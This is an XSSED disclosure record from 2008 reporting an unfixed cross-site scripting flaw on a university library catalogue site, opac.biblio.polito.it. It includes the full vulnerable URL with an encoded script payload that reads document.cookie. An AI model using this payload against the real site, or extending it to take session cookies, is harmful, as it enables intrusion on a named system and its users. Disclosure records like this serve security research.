Unfixed XSS vulnerability at opac.biblio.polito.it

2008-02-28T00:00:00
ID XSSED:33023
Type xssed
Reporter Langy
Modified 2008-05-03T00:00:00

Description

Security researcher Langy, has submitted on 28/02/2008 a cross-site-scripting (XSS) vulnerability affecting opac.biblio.polito.it, which at the time of submission ranked 31575 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/03/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://opac.biblio.polito.it/F/K2MIBPHCRU13SVRBFK4IAHRLL95DM67FXDSIAQQ1C6MJ55CLM3-78057?func=find-e&request=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&find_scan_code=FIND_WRD&adjacent=Y&local_base=TESW&x=0&y=0&filter_code_1=WLN&filter_request_1=&filter_code_2=WYR&filter_request_2=&filter_code_3=WYR&filter_request_3=&filter_code_4=WFM&filter_request_4=&filter_code_5=WBI&filter_request_5=